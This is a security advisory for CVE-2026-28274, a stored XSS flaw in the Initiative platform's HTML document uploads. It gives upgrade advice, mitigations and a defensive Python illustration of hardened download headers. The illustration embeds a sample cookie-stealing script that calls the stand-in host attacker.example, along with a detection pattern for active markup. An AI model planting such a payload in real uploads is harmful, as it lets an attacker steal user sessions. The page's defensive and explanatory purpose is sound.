
Initiative Project Management Platform: Malicious File Uploads

CVE-2026-28274
Summary

Initiative versions before 0.32.4 are vulnerable to stored cross-site scripting through document uploads. Any user with upload permission in the "Initiatives" section can upload an .html or .htm file as a document; the application then serves that file from its own origin with no sandboxing, so script embedded in it runs in the application's context and can send session cookies, authentication tokens or other sensitive data to an attacker-controlled server. Because the file lives under the application's domain, sharing its direct link is enough to trigger execution in the victim's browser. Version 0.32.4 fixes the issue; upgrade to it or later.

What to do

A fix exists: the advisory states that version 0.32.4 resolves the issue, so upgrade to 0.32.4 or later. The affected-versions entry below lists <= 0.32.2 while the advisory text covers every version prior to 0.32.4; treat any release below 0.32.4 as affected. Until you have upgraded, restrict who holds upload permission in the Initiatives section, review documents already uploaded for .html or .htm content, and do not serve uploads inline from the application's origin: return them with Content-Disposition: attachment, X-Content-Type-Options: nosniff and a sandboxing Content-Security-Policy, or host them on a separate origin that carries no session. These interim measures are general mitigations for this class of flaw, not steps taken from the advisory.
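The following is an added illustration, not code from the Initiative project (whose stack and actual 0.32.4 fix are not described on this page). It contrasts the flawed serving pattern the advisory describes, content type guessed from the file extension and the body rendered inline on the application's origin, with a hardened download policy, and includes a detector that catches HTML content even when the uploaded file carries a harmless extension. All function names, the sample upload bytes and the attacker hostname are constructed for the example.

```python
import mimetypes
import os
import re

# Constructed sample upload, shaped like the payload the advisory describes:
# an "HTML document" whose script reads the session cookie and sends it off-site.
# The attacker host is a placeholder; nothing here performs a request.
MALICIOUS_HTML = (
    b"<!DOCTYPE html><html><body><p>Q3 plan</p>\n"
    b"<script>new Image().src='https://attacker.example/c?'+document.cookie</script>\n"
    b"</body></html>"
)
BENIGN_PDF_HEAD = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n"  # constructed, first bytes of a PDF

# Extensions whose bodies a browser treats as an active document when served inline.
ACTIVE_DOCUMENT_EXTS = {".html", ".htm", ".xhtml", ".xht", ".svg", ".mhtml", ".mht"}
# Markup that makes a browser (or its MIME sniffer) render a body as HTML/SVG regardless of name.
ACTIVE_MARKUP = re.compile(
    rb"<\s*(!doctype\s+html|html|head|body|script|iframe|svg|object|embed)\b", re.I
)
ACTIVE_MIME = {"text/html", "application/xhtml+xml", "image/svg+xml"}


def is_active_content(filename: str, data: bytes) -> bool:
    """True if the upload would run script when rendered, judged by extension AND by a
    sniff of the first bytes, so renaming evil.html to notes.txt does not defeat the check."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in ACTIVE_DOCUMENT_EXTS or ACTIVE_MARKUP.search(data[:1024]) is not None


def vulnerable_download_headers(filename: str) -> dict:
    """The flawed pattern behind the advisory: content type guessed from the extension,
    no disposition, no sandbox, so plan.html is rendered inline on the app's origin."""
    ctype, _ = mimetypes.guess_type(filename)
    return {"Content-Type": ctype or "application/octet-stream"}


def _safe_download_name(filename: str) -> str:
    """Basename only, restricted to a safe character set, so the filename cannot
    inject quotes or control characters into the Content-Disposition header."""
    base = os.path.basename(filename.replace("\\", "/"))
    return re.sub(r"[^A-Za-z0-9._-]", "_", base) or "download"


def hardened_download_headers(filename: str, data: bytes) -> dict:
    """Serve any user upload as an opaque download. Content-Disposition: attachment stops
    inline rendering, nosniff stops the browser second-guessing the type, and a CSP
    sandbox denies script even to clients that still render the body. Active content
    is additionally forced to application/octet-stream."""
    ctype, _ = mimetypes.guess_type(filename)
    if is_active_content(filename, data) or ctype in ACTIVE_MIME:
        ctype = "application/octet-stream"
    return {
        "Content-Type": ctype or "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{_safe_download_name(filename)}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


def renders_script_in_origin(headers: dict) -> bool:
    """Simplified model of the browser decision: script runs on the serving origin only
    when the response has an active MIME type, is shown inline, and is not sandboxed."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    inline = not headers.get("Content-Disposition", "").lower().startswith("attachment")
    sandboxed = "sandbox" in headers.get("Content-Security-Policy", "").lower()
    return ctype in ACTIVE_MIME and inline and not sandboxed


if __name__ == "__main__":
    samples = (("plan.html", MALICIOUS_HTML), ("plan.txt", MALICIOUS_HTML), ("plan.pdf", BENIGN_PDF_HEAD))
    for name, body in samples:
        vulnerable = renders_script_in_origin(vulnerable_download_headers(name))
        hardened = renders_script_in_origin(hardened_download_headers(name, body))
        print(f"{name:10} active={is_active_content(name, body)!s:5} "
              f"vulnerable_runs_script={vulnerable!s:5} hardened_runs_script={hardened}")
```

The sniffing check matters because an extension allow-list alone is easy to bypass where the server later guesses the type from content; the disposition and CSP headers matter because they protect even files that slipped past the check. Serving uploads from a separate origin that never receives the application's session cookie is the stronger structural fix and is not shown here.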

Affected software
Vendor      Product      Affected versions   Fix available
morelitea   initiative   <= 0.32.2           –
Original description
Initiative is a self-hosted project management platform. Versions of the application prior to 0.32.4 are vulnerable to Stored Cross-Site Scripting (XSS) in the document upload functionality. Any user with upload permissions within the "Initiatives" section can upload a malicious `.html` or `.htm` file as a document. Because the uploaded HTML file is served under the application's origin without proper sandboxing, the embedded JavaScript executes in the context of the application. As a result, authentication tokens, session cookies, or other sensitive data can be exfiltrated to an attacker-controlled server. Additionally, since the uploaded file is hosted under the application's domain, simply sharing the direct file link may result in execution of the malicious script when accessed. Version 0.32.4 fixes the issue.
Severity: NVD CVSS 3.1 base score 8.7
Vulnerability type
CWE-79 Cross-site Scripting (XSS)
CWE-434 Unrestricted File Upload
Published: 26 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026